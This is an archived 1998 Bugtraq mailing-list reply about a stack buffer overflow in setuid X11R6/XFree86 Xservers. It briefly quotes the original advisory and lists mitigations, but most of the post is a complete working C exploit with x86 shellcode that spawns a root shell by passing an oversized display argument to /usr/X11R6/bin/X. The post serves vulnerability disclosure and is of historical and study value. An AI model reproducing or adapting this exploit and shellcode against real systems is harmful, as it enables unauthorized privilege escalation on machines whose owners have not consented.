Bugtraq mailing list archives

Re: Xserver stack smashed

From: srahul () CSA IISC ERNET IN (Rahul Sahadevan)
Date: Mon, 26 Jan 1998 18:36:36 +0530


On Tue, 13 Jan 1998, Pavel Kankovsky wrote:

--------------------------------------------------------------------------
=>On a system where X11R6-based Xserver (R5 is probably affected too) is
=>installed setuid or setgid (e.g. typical XFree86 installation has XF86_*
=>setuid root), local users can exploit a buffer overrun in its code and
=>gain extra privileges (e.g. root privileges when Xserver is setuid root).
=>Quick fix: remove setuid/setgid bit from all installed Xservers
=>* use xdm or a safe setuid wrapper to start Xserver
=>An actual exploit is left as an exercise for the reader. :)
--------------------------------------------------------------------------

Hi,
        Here is an x86 exploit for the recently discovered X-server buffer
overflow. This program has been tested on most XF86 servers ( version 3.2 )
shipped with Redhat-4.2 and on XF86_SVGA( version 3.2 and 3.3.1 ). It did
not work on XF86_SVGA 3.1.x.

        Use a wrapper to check the arguments passed to the X server or use
Solar Designer's kernel stack patch to prevent the overflow,

Disclaimer:
        This program is for educational purposes only. Please do not
misuse it. I cannot be held responsible for any damage caused by the
use of this program by anyone.

Rahul Sahadevan,
Administrator, Dept of CS & A,
Indian Institute of Sciences.

-------------------------8<-------Xploit.c---------------------------------

    /**********************************************************
    * Adapted from                                            *
    *   "Smashing The Stack For Fun And Profit"               *
    *     in Phrack-49 by Aleph One ( aleph1 () underground org )*
    * by                                                      *
    *   Rahul Sahadevan. ( srahul () csa iisc ernet in )         *
    **********************************************************/

/* Try 2 3 4 5 for OFFSET */
#define OFFSET 2

#include <string.h>
#include <unistd.h>
#include <errno.h>

#define LENCODE ( sizeof( Code ) )
char Code[] =
    "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
    "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
    "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
    "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
    "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
char *args[] = { "X", "-nolock", Display, NULL };

main() {
  dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
  __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
  memcpy( ptr + 4, ptr, 0x3fc );
  memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
  memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
  execve( "/usr/X11R6/bin/X", args, args + 3 );
  perror( "execve" );
}

--------------------------------8<-----------------------------------------

Current thread:

Quake 2 Linux, (continued)
- - - Quake 2 Linux kevingeo () CRUZIO COM (Jan 25)
    - Re: Quake 2 Linux Greg Alexander (Jan 27)
    - Announcement: Phrack 52 route () RESENTMENT INFONEXUS COM (Jan 26)
    - Microsoft responds to bug in Exchange Server Tony Hagale (Jan 27)
    - Re: Announcement: Phrack 52 Olaf Kirch (Jan 28)
    - KSR[T] Advisory #7: filter KSR[T] (Jan 29)
    - Bug in IMail's pop3d32.exe RHS Linux User (Jan 29)
    - Secure Linux patch Solar Designer (Jan 29)
    - Gaining Domain Admins access on LAN (fwd) Weld Pond (Jan 28)
    - GZEXE - the big problem Micha? Zalewski (Jan 28)
  - Re: Xserver stack smashed Rahul Sahadevan (Jan 26)
  - Vulnerability in htmlscript Dennis Moore (Jan 26)
  - ANNOUNCE: Secure Syslog Lucio Torre (Jan 26)
  - Security flaw in htmlscript Joseph Jay Austin (Jan 27)
- Re: Correction: CPSN 9:971208: Solaris /var Permission Problems Randy Mikesell (Jan 13)
  - Re: Correction: CPSN 9:971208: Solaris /var Permission Problems Tom Perrine (Jan 13)